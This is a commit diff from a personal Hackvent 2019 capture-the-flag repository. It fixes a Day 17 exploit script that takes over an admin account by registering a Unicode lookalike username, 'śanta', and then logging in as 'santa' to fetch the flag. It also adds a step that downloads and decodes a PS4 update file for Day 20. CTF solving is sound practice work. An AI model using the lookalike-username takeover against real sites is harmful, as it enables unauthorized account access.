Home Explore Help
Register Sign In
Roman
/
Hackvent_2019
1
0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Browse Source

Day 20 + 17 fix

Roman Hergenreder 4 years ago
parent
a9efab946d
commit
45862b6590
3 changed files with 33 additions and 5 deletions
Split View Show Diff Stats
  1. 3 3
      Day 17/exploit.py
  2. 1 0
      Day 20/.gitignore
  3. 29 2
      Day 20/decode.py

+ 3 - 3
Day 17/exploit.py
View File 

@@ -13,21 +13,21 @@ FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
 
 # 1. register user santa
 
 res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
 
 if res.status_code != 200 or "Registration successful!" not in res.text:
 
-    print("Server returned: %d %s" % (res.status_code, res.status_text))
 
+    print("Server returned: %d %s" % (res.status_code, res.reason))
 
     print(res.text)
 
     exit(1)
 
 
 # 2. login
 
 res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
 
 if res.status_code != 200 or "username not found or wrong password!" in res.text:
 
-    print("Server returned: %d %s" % (res.status_code, res.status_text))
 
+    print("Server returned: %d %s" % (res.status_code, res.reason))
 
     print(res.text)
 
     exit(1)
 
 
 # 3. get flag
 
 res = SESSION.get(BASE_URL + "/admin.php")
 
 if res.status_code != 200 or "username not found or wrong password!" in res.text:
 
-    print("Server returned: %d %s" % (res.status_code, res.status_text))
 
+    print("Server returned: %d %s" % (res.status_code, res.reason))
 
     exit(1)
 
 
 print(FLAG_PATTERN.search(res.text))

+ 1 - 0
Day 20/.gitignore
View File 

@@ -0,0 +1 @@
 
+PS4UPDATE\.PUP

+ 29 - 2
Day 20/decode.py
View File 

@@ -1,9 +1,36 @@
 
+#!/usr/bin/python
 
 
-byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, 0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5]
 
+import requests
 
+import hashlib
 
+import os
 
 
+byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, \
 
+            0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5]
 
+
 
+EXPECTED_HASH = "f86d4f9d2c049547bd61f942151ffb55"
 
+INPUT_FILE = "PS4UPDATE.PUP"
 
 BUFFER_LENGTH = len(byte_300)
 
 
-with open("PS4UPDATE.PUP", "rb") as f:
 
+def downloadFile():
 
+    print("Downloading file…")
 
+    res = requests.get("https://psarchive.darksoftware.xyz/505Retail.PUP")
 
+    if res.status_code != 200:
 
+        print("Server returned: %d %s" % (res.status_code, res.reason))
 
+        exit(1)
 
+
 
+    buffer = res.content
 
+    hash = hashlib.md5(buffer).hexdigest()
 
+    if hash != EXPECTED_HASH:
 
+        print("Hash does not match:", hash)
 
+        exit(1)
 
+
 
+    with open(INPUT_FILE, "wb") as f:
 
+        f.write(buffer)
 
+
 
+if not os.path.isfile(INPUT_FILE):
 
+    downloadFile()
 
+
 
+with open(INPUT_FILE, "rb") as f:
 
 
     v29 = byte_300.copy()
 
     v14 = 4919;